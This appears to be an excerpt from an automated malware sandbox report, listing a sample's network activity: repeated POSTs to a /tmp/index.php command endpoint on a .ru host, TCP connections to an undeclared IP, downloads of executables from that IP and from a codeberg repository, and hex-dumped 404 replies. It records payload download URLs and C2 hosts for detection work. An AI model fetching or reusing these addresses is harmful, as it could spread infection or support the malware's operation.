              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iwomylugxujp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqlmgxiqipmlfda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mhabccdcfgoeshi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhqjabyurfswwyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfivjaggias.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oecmcnbulbfndgqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpydbdrotfs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qrkdkbqfwfclqg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owadrehnugjdh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wyvokdhlnlrsvuh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://daglechfqxgadh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lshvsjxacvhbre.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nweaheqhdcfapi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwpopyrbbpjc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syllqtgnchytfjbx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: nwgrus.ru
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
              Source: global trafficHTTP traffic detected: GET /alexcode11/templates/raw/branch/main/setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: codeberg.org
              Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
              Source: global trafficDNS traffic detected: DNS query: codeberg.org
              Source: global trafficDNS traffic detected: DNS query: calvinandhalls.com
              Source: global trafficDNS traffic detected: DNS query: bestworldhools.com
              Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymfsjxxjefdfso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 